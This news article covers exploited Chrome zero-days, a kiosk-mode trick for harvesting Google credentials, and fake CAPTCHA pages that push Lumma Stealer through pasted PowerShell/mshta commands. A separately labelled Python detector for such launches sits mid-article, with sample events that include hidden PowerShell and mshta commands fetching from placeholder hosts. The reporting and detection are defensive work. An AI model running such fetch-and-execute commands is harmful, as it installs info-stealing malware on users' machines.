Updated on September 16 with a new CAPTCHA attack targeting Windows users.
The last few weeks have been quite busy for Chrome, with a lot of news for its 3 billion users. And so it would be very easy to forget that the update deadline is now only 72 hours away. Google has confirmed that attackers have actively exploited two dangerous vulnerabilities in Chrome, and users should not remain unprotected.
The first of these memory vulnerabilities was made public in a Chrome update on August 21, in which Google warned that CVE-2024-7971 was being actively exploited. What was worse was that a second memory vulnerability fixed in the same update—CVE-2024-7965—was also under attack. Google confirmed this a week later.
The US government's cybersecurity agency, CISA, has added both threats to its Known Exploited Vulnerabilities (KEV) catalog, requiring all federal employees to update Chrome by September 16 (and September 18 for a second fix) or stop using their browser. And while CISA's deadlines are only mandatory for government employees, many organizations comply with its orders. Put simply: there are two actively exploited vulnerabilities, so update Chrome now if you haven't done so since early September.
As CISA explains, it “maintains the authoritative source of vulnerabilities that have been exploited in the wild. Organizations should use the KEV Catalog as input to their vulnerability management prioritization framework.”
There have been two desktop Chrome updates since then, on September 2 and 10 respectively, both of which addressed high-severity vulnerabilities, though none of the vulnerabilities have yet been confirmed to have been actively exploited.
Somewhat ironically, given Microsoft's own procession of zero-days, including this week’s Patch Tuesday, one of the critical Chrome vulnerabilities was discovered and disclosed by Microsoft, which attributed the attack to North Korean crypto hackers who chained the Chrome vulnerability with a Windows zero-day (now patched).
Microsoft suggested this as a reason for users to switch from Chrome to Edge, advising organizations to “encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.”
While I wouldn't recommend switching browsers on that basis, Microsoft's point that Chrome phishing lures should be stopped at the source is important. And Google is taking its own steps to do just that. Google assured this week that its “redesigned Safety Check feature will now run automatically in the background on Chrome, taking more proactive steps to keep you safe. It will also notify you of actions it takes, including revoking permissions from sites you no longer visit, flagging potentially unwanted notifications, and more.”
Microsoft has just released its latest Microsoft Threat Intelligence podcast, which sheds light on the nature of the North Korean threat behind the disclosure of CVE-2024-7971. It also sheds some light on the “surprising nature of recent attack chains involving vulnerabilities in the Chromium engine.”
Chrome faces a lot of criticism – the downside of market dominance – but it deserves credit for its continued improvement, though you have to ignore the built-in advertising and cookie-driven data collection. It's making a difference, as a shocking exchange on X this week showed. Google's crackdown on information stealers exploiting Chrome's vulnerabilities is starting to close the stable door. However, the exchange shows the other side is clearly intent on finding new ways around it.
While the latest worldwide browser market share data shows that Edge continues to build its user base, it's happening at an exceptionally slow pace; StatCounter reports a statistically inconsequential increase from 13.75% in July to 13.78% in August this year, although year-over-year growth is more encouraging, with Edge up from 11.15% a year ago.
Updating Chrome to the latest release will address the two exploited zero-days as well as everything that has been fixed since then. As always, check that the update is downloaded and then restart your browser to make sure it's installed. If you've switched to Edge, you need to do the same – the actively exploited threats affect both browsers.
Sometimes the most dangerous threats are in plain sight, and can strike even when you've done the right thing and updated. That's certainly the case with a new warning for Chrome users, along with a new attack that can frustrate you into doing something you know you shouldn't – which makes it even worse.
As reported by Bleeping Computer, this new attack – first disclosed by OALABS Research – is “a new technique used by stealers to force victims to enter credentials into the browser, which can then be stolen from the browser’s credential store using traditional stealer malware.”
This opens the door for the StealC malware, whose campaign is specifically designed to steal Google account credentials, the researchers said. The attack works by forcing the browser into “kiosk mode” before navigating to the login page of the “targeted service, typically Google.” This kiosk mode is a full-screen web view, and the attack prevents exiting or even navigating away from full-screen.
“This tactic annoys the victim and forces them to enter their credentials in an attempt to close the window. Once the credentials are entered, they are stored in the browser's credential store on disk and can be stolen using the Stealer malware, which is deployed with the credential flusher.”
As Bleeping Computer explains, because the normal keys have been disabled, you should “try other hotkey combos such as 'Alt + F4', 'Ctrl + Shift + Esc', 'Ctrl + Alt + Delete', and 'Alt + Tab'.” If that doesn't return focus to your desktop, “Pressing 'Win Key + R' should open the Windows Command Prompt. Type 'cmd' and then close Chrome with 'taskkill /IM chrome.exe /F'.” Or, failing that, hard reboot your PC.
There's also a second, more dangerous new threat for Chrome users that's now becoming apparent, though it's so simple that it should be pretty easy to spot. Hopefully, if it does attack your PC, you won't fall victim to it and will shut it down immediately.
This attack relies on the use of a fake CAPTCHA and was first flagged by Palo Alto Networks' Unit 42, but received little attention at the time. Now a video from researcher John Hammond is circulating on X, which should raise its profile.
As the researchers explain, “As recently as 2024-08-27, fake verification pages have been set up to distribute the Lumma Stealer malware. These pages contain a button that, when clicked, shows victims instructions to paste a PowerShell script into the Run window. This copy/paste PowerShell script retrieves and runs the Windows EXE for the Lumma Stealer malware. The associated Lumma Stealer EXE files retrieve and use ZIP archives that do not appear to be inherently malicious in themselves.”
Lumma Stealer is an information-stealer that is often rented out as a dangerous malware-as-a-service offering; it targets user credentials and crypto wallets. As you can see from the video (below), it doesn't look like an everyday captcha, with its requests for users to copy, paste and run a script. Frankly, if alarm bells aren't ringing in your head at this point, you should probably shut down your PC and relax.
Hudson Rock's Infostealers website reported the same attack two weeks ago, but it still did not get the attention it deserved. “Through the end of August 2024, attackers are using fraudulent 'human verification' pages to trick users into executing malicious PowerShell scripts,” the researchers warned.
The captcha is delivered by the source code of the malicious website the user visits. “This code clearly shows that when the verification button is clicked, the encrypted code is automatically copied to the clipboard.”
That code triggers the mshta binary, “a legitimate Windows utility used to execute HTML applications (HTA) and handle embedded scripts… Since it is a binary trusted and signed by Microsoft, it often bypasses security filters, making it a prime candidate for exploitation in 'living off the land' attacks. This technique allows attackers to execute malicious scripts without raising an alarm, since mshta.exe will not typically be flagged by antivirus or endpoint security systems.”
If you haven't cut and run by this point, the malware will execute another command to download the Lumma Stealer payload, “which is designed to exfiltrate sensitive information such as passwords, session tokens, cryptocurrency wallets, and other personal data from infected machines.”
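The chain Hudson Rock describes, a trusted script host such as mshta.exe launched by hand from the Run dialog and pulling the next stage from a remote site, has a recognisable shape in process-creation telemetry: the script host's parent is the interactive shell and its command line references a URL. The Python below is an added example, not code from this article, Hudson Rock or Unit 42; the events are constructed (RFC 5737 documentation addresses, invented paths) and the field names follow the generic parent image / image / command line shape rather than any particular product's schema.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcessEvent:
    """One process-creation record: who launched what, with which arguments."""
    parent_image: str
    image: str
    command_line: str


# Constructed sample telemetry; the addresses are RFC 5737 documentation
# ranges and the paths are invented. None of this is from a real incident.
SAMPLE_EVENTS = [
    ProcessEvent("explorer.exe", "mshta.exe",
                 "mshta https://203.0.113.10/verify"),
    ProcessEvent("explorer.exe", "powershell.exe",
                 'powershell -w hidden -c "iwr http://198.51.100.7/next"'),
    ProcessEvent("msiexec.exe", "mshta.exe",
                 r'mshta "C:\Program Files\ExampleVendor\setup.hta"'),
    ProcessEvent("explorer.exe", "notepad.exe", "notepad notes.txt"),
    ProcessEvent("explorer.exe", "powershell.exe", "powershell Get-Date"),
]

# Signed Microsoft script hosts that commonly feature in living-off-the-land chains.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
# A paste into the Run dialog shows up as a child of the interactive shell.
INTERACTIVE_PARENTS = {"explorer.exe"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
HIDDEN_WINDOW_RE = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.IGNORECASE)


def classify(event: ProcessEvent) -> List[str]:
    """Return the reasons an event looks like a paste-and-run script launch (empty if none)."""
    image = event.image.lower()
    if image not in SCRIPT_HOSTS:
        return []
    reasons = []
    if URL_RE.search(event.command_line):
        reasons.append("remote content referenced on the command line")
    if event.parent_image.lower() in INTERACTIVE_PARENTS:
        reasons.append("script host launched interactively from the shell")
    if image in {"powershell.exe", "pwsh.exe"} and HIDDEN_WINDOW_RE.search(event.command_line):
        reasons.append("hidden window requested")
    return reasons


def severity(reasons: List[str]) -> str:
    """A script host fetching remote content is the chain described above; rate it high."""
    if any(r.startswith("remote content") for r in reasons):
        return "high"
    return "low" if reasons else "none"


def triage(events: List[ProcessEvent]) -> List[Tuple[ProcessEvent, str, List[str]]]:
    """Keep only the events with at least one reason, tagged with a severity."""
    alerts = []
    for event in events:
        reasons = classify(event)
        if reasons:
            alerts.append((event, severity(reasons), reasons))
    return alerts


if __name__ == "__main__":
    for event, sev, reasons in triage(SAMPLE_EVENTS):
        print(f"[{sev}] {event.parent_image} -> {event.image}: {event.command_line}")
        for reason in reasons:
            print(f"    - {reason}")
```

On the constructed sample the locally installed .hta launched by an installer and the notepad launch produce no alert, the interactive PowerShell one-liner is rated low, and the two launches that reach out to a URL are rated high. In a real environment the interactive-parent signal alone is noisy (administrators do type PowerShell into the Run box), so the combination of script host, shell parent and remote URL is the condition worth paging on.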
Just like the Google login window running in full-screen kiosk mode, the intention here is to socially engineer an attack that hides behind familiarity, tricking users into trusting the Google login or website captcha verification box. CAPTCHA tests have become such an everyday part of using the web that we tend to overlook them. And where these were all once very similar, we now see much more variety than before as “are you human” challenges evolve.
And this situation is only going to get worse. CAPTCHA, which stands for “Completely Automated Public Turing test to tell Computers and Humans Apart,” will be one of many beneficiaries of the rapid integration of more advanced AI into everything we do online and the way we interact with our devices. Although this attack is crude and easy to detect, you can expect more sophisticated variations on this theme to emerge, especially as we all find our feet in this brave new world.
As PC Mag warns, “Malicious CAPTCHA tests can easily be delivered to the target by sending phishing emails or messages. Users should therefore be careful if they receive any unusual requests from a CAPTCHA test; it could be a trap.”
All this shows that you can do all the right things, including updating as soon as possible, and still have a socially engineered campaign coming for your data. If you find yourself suffering from this or a similar issue, be sure to run an updated antivirus scan on your PC before resuming use as normal.